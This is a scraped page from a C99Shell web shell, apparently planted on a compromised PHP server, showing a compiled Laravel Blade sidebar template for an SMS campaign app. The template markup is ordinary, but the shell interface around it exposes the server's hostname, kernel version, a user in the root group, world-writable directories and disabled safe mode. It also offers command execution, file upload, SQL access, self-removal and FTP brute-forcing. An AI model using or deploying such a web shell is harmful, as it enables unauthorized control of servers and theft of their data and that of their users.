!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/storage/framework/views/   drwxrwxrwx
Free 28.37 GB of 117.98 GB (24.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     4b79cd99b97ef7ba776814a53d8fd06d0463d3a1.php (22.08 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<ul class="nav nav-pills nav-sidebar flex-column" data-widget="treeview" role="menu" data-accordion="false">
    <!-- Add icons to the links using the .nav-icon class
         with font-awesome or any other icon font library -->

    <li class="nav-item dropdown user-menu mr-3 top-up-section ml-3">
        <div class="row credit-section card">
            <div class="card-body pb-0 pl-0">
                <div class="col-sm-12">
                    <div class="row">
                        <div class="">
                            <div class="sms-wallet-text">Balance</div>
                        </div>
                        <?php if(Module::has('PaymentGateway') && Module::find('PaymentGateway')->isEnabled()): ?>
                            <div class="top-up-sm-btn">
                                <a href="#" class="topUpBtn btn btn-primary mr-3 btn-sm">
                                    Top-Up
                                </a>
                            </div>
                        <?php endif; ?>
                    </div>
                </div>

                <div class="col-sm-12 sender-border m-2">
                    <div class="sender-text"><strong><?php echo e(isset(wallet()->credit)?wallet()->credit:0); ?></strong> <span class="text_available">(Available)</span></div>
                </div>
            </div>

        </div>
    </li>

    <li class="nav-item sidebar-compose d-none">
        <a href="<?php echo e(route('customer.smsbox.compose')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.compose')); ?>">
            <i class="nav-icon fas fa-plus-circle n-primary-c"></i>
            <p>
                <?php echo e(trans('customer.compose')); ?>

            </p>
        </a>
    </li>

    <!--Dashboard  -->
    <li class="nav-item">
        <a href="<?php echo e(route('customer.dashboard')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.dashboard')); ?>">
            <i class="nav-icon fas fa-tachometer-alt n-info-c"></i>
            <p>
                <?php echo e(trans('customer.dashboard')); ?>

            </p>
        </a>
    </li>

    <!--Message Overview  -->
    <li class="nav-item">
        <a href="<?php echo e(route('customer.smsbox.overview')); ?>"
           class="nav-link <?php echo e(isSidebarActive('customer.smsbox.overview')); ?>">
            <i class="nav-icon fas fa-envelope n-danger-c"></i>
            <p>
                <?php echo e(trans('customer.message_overview')); ?>

            </p>
        </a>
    </li>

    <!--Campaign  -->
    <li class="nav-item has-treeview <?php echo e(isSidebarTrue(['customer.campaign.index','customer.sms.template.*'])? 'menu-open' ''); ?>">
        <a href="#"
           class="nav-link <?php echo e(isSidebarTrue(['customer.campaign.index','customer.sms.template.*'])? 'active nav-link-active' ''); ?>">
            <i class="nav-icon fa fa-bullhorn n-warning-c"></i>
            <p>
                <?php echo e(trans('customer.campaign')); ?>

                <i class="right fas fa-angle-left"></i>
            </p>
        </a>
        <ul class="nav nav-treeview"
            style="display: <?php echo e(isSidebarTrue(['customer.campaign.*','customer.sms.template.*'])? 'block''none'); ?>;">
            <li class="nav-item">
                <a href="<?php echo e(route('customer.campaign.create')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.campaign.create')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.campaign_create')); ?>

                    </p>
                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.campaign.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.campaign.index')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.campaign_list')); ?>

                    </p>
                </a>
            </li>


            <li class="nav-item">
                <a href="<?php echo e(route('customer.sms.template.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.sms.template.*')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('Create SMS Template')); ?>

                    </p>
                </a>
            </li>
        </ul>
    </li>

    <!--Dynamic Campaign  -->
    <li class="nav-item has-treeview <?php echo e(isSidebarTrue(['customer.dynamic.campaign','customer.dynamic.campaign.*','customer.dynamic-template.*'])? 'menu-open' ''); ?>">
        <a href="#"
           class="nav-link <?php echo e(isSidebarTrue(['customer.dynamic.campaign','customer.dynamic.campaign.*','customer.dynamic-template.*'])? 'active nav-link-active' ''); ?>">
            <i class="nav-icon fa fa-bullhorn n-success-c"></i>
            <p>
                <?php echo e(trans('Personalize Campaign')); ?>

                <i class="right fas fa-angle-left"></i>
            </p>
        </a>
        <ul class="nav nav-treeview"
            style="display: <?php echo e(isSidebarTrue(['customer.dynamic.campaign','customer.dynamic-template.*','customer.dynamic.campaign.*'])? 'block''none'); ?>;">
            <li class="nav-item">
                <a href="<?php echo e(route('customer.dynamic.campaign.create')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.dynamic.campaign.create')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.campaign_create')); ?>

                    </p>
                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.dynamic.campaign')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.dynamic.campaign')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.campaign_list')); ?>

                    </p>
                </a>
            </li>

            <li class="nav-item">
                <a href="<?php echo e(route('customer.dynamic-template.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.dynamic-template.*')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('Template')); ?>

                    </p>
                </a>
            </li>


        </ul>
    </li>


    <li  class="nav-item has-treeview d-none  <?php echo e(isSidebarTrue(['customer.smsbox.*','customer.smsbox.overview'])? 'menu-open' ''); ?>">
        <a href="#" class="nav-link <?php echo e(isSidebarTrue(['customer.smsbox.*','customer.smsbox.overview'])? 'active nav-link-active' ''); ?>">
            <i class="nav-icon fas fa-envelope n-primary-c"></i>
            <p>
                <?php echo e(trans('customer.message')); ?>

                <i class="right fas fa-angle-left"></i>
            </p>
        </a>
        <ul class="nav nav-treeview" style="display: <?php echo e(isSidebarTrue(['customer.smsbox.*','customer.smsbox.overview'])? 'block''none'); ?>">

            <li class="nav-item d-none">
                <a href="<?php echo e(route('customer.smsbox.compose',['type'=>'voice_call'])); ?>"
                   class="nav-link <?php echo e(request()->get('type') == 'voice_call'?'active':''); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.sent_using_voice_call')); ?>

                    </p>
                </a>
            </li>
        </ul>
    </li>

    <!--Senders  -->
    <li class="nav-item has-treeview <?php echo e(isSidebarTrue(['customer.numbers*','customer.from-group.*','customer.sender-id.*','customer.whatsapp.numbers','customer.groups.*'])? 'menu-open' ''); ?>">
        <a href="<?php echo e(route('customer.campaign.index')); ?>" class="nav-link <?php echo e(isSidebarTrue(['customer.numbers.*','customer.from-group.*','customer.sender-id.*','customer.whatsapp.numbers','customer.groups.*'])? 'active nav-link-active' ''); ?>">
            <i class="nav-icon fab fa-telegram n-info-c"></i>
            <p>
                <?php echo e(trans('customer.senders')); ?>

                <i class="right fas fa-angle-left"></i>
            </p>
        </a>
        <ul class="nav nav-treeview" style="display: <?php echo e(isSidebarTrue(['customer.numbers.*','customer.from-group.*','customer.sender-id.*','customer.whatsapp.numbers','customer.groups.*'])? 'block''none'); ?>">
            <li class="nav-item" id="phone-number">
                <a href="<?php echo e(route('customer.numbers.phone_numbers')); ?>"
                   class="nav-link <?php echo e(isSidebarActive('customer.numbers.phone_numbers')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.phone_number')); ?>

                    </p>
                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.sender-id.index')); ?>"
                   class="nav-link <?php echo e(isSidebarActive('customer.sender-id*')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.sender_id')); ?>

                    </p>
                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.from-group.index')); ?>"
                   class="nav-link <?php echo e(isSidebarActive('customer.from-group.*')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.from_group')); ?>

                    </p>
                </a>
            </li>

        </ul>
    </li>

    <!--Chat Box  -->
    <li class="nav-item has-treeview <?php echo e(isSidebarTrue(['customer.chat.index','customer.chat.response'])? 'menu-open' ''); ?>">
        <a href="#" class="nav-link <?php echo e(isSidebarTrue(['customer.chat.index','customer.chat.response'])? 'active nav-link-active' ''); ?>">
            <i class="nav-icon fas fa-sms n-danger-c"></i>
            <p>
                <?php echo e(trans('Chat Box')); ?>

                <i class="right fas fa-angle-left"></i>
            </p>
        </a>

        <ul class="nav nav-treeview"
            style="display: <?php echo e(isSidebarTrue(['customer.chat.index','customer.chat.response'])? 'block''none'); ?>;">

            <li class="nav-item">
                <span class="inbox_counter  counter d-none">0</span>
                <a href="<?php echo e(route('customer.chat.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.chat.index')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.chat')); ?>

                    </p>
                </a>
            </li>

            <li class="nav-item">
                <a href="<?php echo e(route('customer.chat.response')); ?>"
                   class="nav-link <?php echo e(isSidebarActive('customer.chat.response')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('Chat Response')); ?>

                    </p>
                </a>
            </li>
        </ul>
    </li>

    <!--Contacts  -->
    <li class="nav-item <?php echo e(isSidebarTrue(['customer.group.records','customer.label.*','customer.contacts.*'])? 'menu-open' ''); ?>">
        <a href="<?php echo e(route('customer.contacts.index')); ?>" class="nav-link <?php echo e(isSidebarTrue(['customer.group.records','customer.label.*','customer.contacts.*'])? 'active nav-link-active' ''); ?>">
            <i class="nav-icon fas fa-phone-alt n-warning-c"></i>
            <p>
                <?php echo e(trans('customer.contacts')); ?>

                <i class="right fas fa-angle-left"></i>
            </p>
        </a>
        <ul class="nav nav-treeview" style="display: <?php echo e(isSidebarTrue(['customer.group.records','customer.label.*','customer.contacts.*'])? 'block''none'); ?>">
            <li class="nav-item">
                <a href="<?php echo e(route('customer.contacts.index')); ?>"
                   class="nav-link <?php echo e(isSidebarActive('customer.contacts.*')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.list')); ?>

                    </p>
                </a>
            </li>

            <li class="nav-item">
                <a href="<?php echo e(route('customer.group.records')); ?>"
                   class="nav-link <?php echo e(isSidebarActive('customer.group.records')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.builder')); ?>

                    </p>
                </a>
            </li>

            <li class="nav-item">
                <a href="<?php echo e(route('customer.label.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.label.*')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.labels')); ?>

                    </p>
                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.groups.index')); ?>"
                   class="nav-link <?php echo e(isSidebarActive('customer.groups.*')); ?>">
                    <i class="nav-icon fa fa-angle-double-right"></i>
                    <p>
                        <?php echo e(trans('customer.groups')); ?>

                    </p>
                </a>
            </li>

        </ul>

    </li>

    <!--Keyword  -->
    <li class="nav-item">
        <a href="<?php echo e(route('customer.keywords.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.keywords.*')); ?>">
            <i class="nav-icon fas fa-file-word n-success-c"></i>
            <p>
                <?php echo e(trans('customer.keywords')); ?>

            </p>
        </a>
    </li>

    <!--Report  -->
    <li class="nav-item has-treeview <?php echo e(isSidebarTrue(['customer.transactions','customer.message.reports'])? 'menu-open' ''); ?>">
        <a href="#" class="nav-link <?php echo e(isSidebarTrue(['customer.transactions','customer.message.reports'])? 'active nav-link-active' ''); ?>">
            <i class="nav-icon fa fa-info n-info-c"></i>
            <p>
                Reports
                <i class="right fas fa-angle-left"></i>
            </p>
        </a>
        <ul class="nav nav-treeview"
            style="display: <?php echo e(isSidebarTrue(['customer.transactions','customer.message.reports'])? 'block''none'); ?>;">

            <li class="nav-item">
                <a href="<?php echo e(route('customer.transactions')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.transactions')); ?>">
                    <i class="fa fa-angle-double-right nav-icon"></i>
                    <p>
                        <?php echo e(trans('Transactions')); ?>

                    </p>
                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.message.reports')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.message.reports')); ?>">
                    <i class="fa fa-angle-double-right nav-icon"></i>
                    <p>
                        <?php echo e(trans('Messages')); ?>

                    </p>
                </a>
            </li>


        </ul>
    </li>

    <!--Billing  -->
    <li class="nav-item">
        <a href="<?php echo e(route('customer.billing.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.billing.*')); ?>">
            <i class="nav-icon fas fa-file-invoice-dollar n-primary-c"></i>
            <p>
                <?php echo e(trans('customer.billing')); ?>

            </p>
        </a>
    </li>

    <!--Ticket  -->
    <li class="nav-item">
        <a href="<?php echo e(route('customer.ticket.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.ticket.index')); ?>">
            <i class="nav-icon fas fa-question-circle n-success-c"></i>
            <p>
                <?php echo e(trans('admin.ticket.ticket')); ?>

            </p>
        </a>
    </li>

    <!--Frontend  -->
    <?php if(auth('customer')->user()->type=='reseller'): ?>
        <?php if(checkModule('landing_page')): ?>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.template')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.template')); ?>">
                    <i class="nav-icon fas fa-laptop n-danger-c"></i>
                    <p>
                        <?php echo e(trans('Frontend')); ?>

                    </p>
                </a>
            </li>
        <?php endif; ?>
    <?php endif; ?>

    <!--Settings  -->
    <li class="nav-item">
        <a href="<?php echo e(route('customer.settings.index')); ?>" class="nav-link <?php echo e(request()->get('type') == 'settings'?'':isSidebarActive('customer.settings.*')); ?>">
            <i class="nav-icon fas fa-cog n-warning-c"></i>
            <p>
                <?php echo e(trans('customer.settings')); ?>

            </p>
        </a>
    </li>

    <!--Developer  -->
    <?php if(api_availability()): ?>
        <li class="nav-item">
            <a href="<?php echo e(route('customer.authorization.token.create')); ?>"
               class="nav-link <?php echo e(isSidebarActive('customer.authorization.token.create')); ?>">
                <i class="fas fa-laptop-code nav-icon n-info-c"></i>
                <p>
                    <?php echo e(trans('Developer')); ?>

                </p>
            </a>
        </li>
    <?php endif; ?>


    <?php if(auth('customer')->user()->type=='reseller'): ?>

    <li class="nav-header mt-2 ml-2 mr-2 custom-separator"></li>

    <li class="nav-item reseller-sections pl-1 text-muted pt-2">
        <h6><?php echo e(trans('Reseller Panel')); ?></h6>
    </li>


        <!--Reseller Customers  -->
        <li class="nav-item">
            <a href="<?php echo e(route('customer.reseller-customers.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.reseller-customers.*')); ?>">
                <i class="nav-icon fa fa-angle-double-right n-primary-c"></i>
                <p>
                    <?php echo e(trans('customer.customer')); ?>

                </p>
            </a>
        </li>

        <!--Reseller TopUp Request  -->
        <li class="nav-item">
            <span class="topup_counter  counter d-none">0</span>
            <a href="<?php echo e(route('customer.topup.request')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.topup.request')); ?>">
                <i class="fa fa-angle-double-right nav-icon n-success-c"></i>
                <p>
                    <?php echo e(trans('admin.topup_request')); ?>

                </p>
            </a>
        </li>

        <!--Reseller Plan  -->
        <li class="nav-item">
            <span class="plan_counter  counter d-none">0</span>
            <a href="<?php echo e(route('customer.plans.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.plans.*')); ?>">
                <i class="nav-icon fa fa-angle-double-right n-info-c"></i>
                <p>
                    <?php echo e(trans('customer.plan')); ?>

                </p>
            </a>
        </li>

        <!--Reseller Coverage  -->
        <li class="nav-item">
            <span class="plan_counter  counter d-none">0</span>
            <a href="<?php echo e(route('customer.coverage.index')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.coverage.*')); ?>">
                <i class="nav-icon fa fa-angle-double-right n-warning-c"></i>
                <p>
                    <?php echo e(trans('Coverage')); ?>

                </p>
            </a>
        </li>

        <!--Reseller Customer Reports  -->
        <li class="nav-item has-treeview <?php echo e(isSidebarTrue(['customer.user.message.reports','customer.user.transactions'])? 'menu-open' ''); ?>">
            <a href="#" class="nav-link <?php echo e(isSidebarTrue(['customer.user.message.reports','customer.user.transactions'])? 'active nav-link-active' ''); ?>">
                <i class="nav-icon fa fa-file-invoice n-primary-c"></i>
                <p>
                    Reports
                    <i class="right fas fa-angle-left"></i>
                </p>
            </a>
            <ul class="nav nav-treeview"
                style="display: <?php echo e(isSidebarTrue(['customer.user.message.reports','customer.user.transactions'])? 'block''none'); ?>;">


                <li class="nav-item">
                    <a href="<?php echo e(route('customer.user.transactions')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.user.transactions')); ?>">
                        <i class="fa fa-angle-double-right nav-icon"></i>
                        <p>
                            <?php echo e(trans('Transactions')); ?>

                        </p>
                    </a>
                </li>

                <li class="nav-item">
                    <a href="<?php echo e(route('customer.user.message.reports')); ?>" class="nav-link <?php echo e(isSidebarActive('customer.user.message.reports')); ?>">
                        <i class="fa fa-angle-double-right nav-icon"></i>
                        <p>
                            <?php echo e(trans('Message')); ?>

                        </p>
                    </a>
                </li>

            </ul>
        </li>
    <?php endif; ?>
</ul>
<?php /**PATH /home/picotech/domains/test.sms.picotech.app/public_html/resources/views/layouts/includes/customer_sidebar.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--